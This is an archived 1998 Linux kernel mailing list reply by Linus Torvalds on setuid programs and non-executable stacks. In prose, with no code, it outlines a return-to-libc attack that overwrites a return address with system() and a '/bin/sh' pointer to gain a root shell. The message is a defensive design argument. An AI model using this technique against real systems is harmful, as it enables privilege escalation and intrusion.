![[LWN Logo]](/images/lwn.banner.gif)
Date: Tue, 4 Aug 1998 14:35:14 -0700 (PDT) From: Linus Torvalds <torvalds@transmeta.com> To: Alan Cox <alan@lxorguk.ukuu.org.uk> Subject: Re: [PATCH] [SECURITY] suid procs exec'd with bad 0,1,2 fds On Tue, 4 Aug 1998, Alan Cox wrote: > > Its actually very hard to get anything beyond a denial of service attack > via libc vectors. Its doable It's _really_ easy. You do something like this: - overflow the buffer on the stack, so that the return value is overwritten by a pointer to the "system()" library function. - the next four bytes are crap (a "return pointer" for the system call, which you don't care about) - the next four bytes are a pointer to some random place in the shared library again that contains the string "/bin/sh" (and yes, just do a strings on the thing and you'll find it). Voila. You didn't have to write any code, the _only_ thing you needed to know was where the library is loaded by default. And yes, it's library-specific, but hey, you just select one specific commonly used version to crash. Suddenly you have a root shell on the system. So it's not only doable, it's fairly trivial to do. In short, anybody who thinks that the non-executable stack gives them any real security is very very much living in a dream world. It may catch a few attacks for old binaries that have security problems, but the basic problem is that the binaries allow you to overwrite their stacks. And if they allow that, then they allow the above exploit. It probably takes all of five lines of changes to some existing exploit, and some random program to find out where in the address space the shared libraries tend to be loaded. Linus - To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.rutgers.edu Please read the FAQ at http://www.altern.org/andrebalsa/doc/lkml-faq.html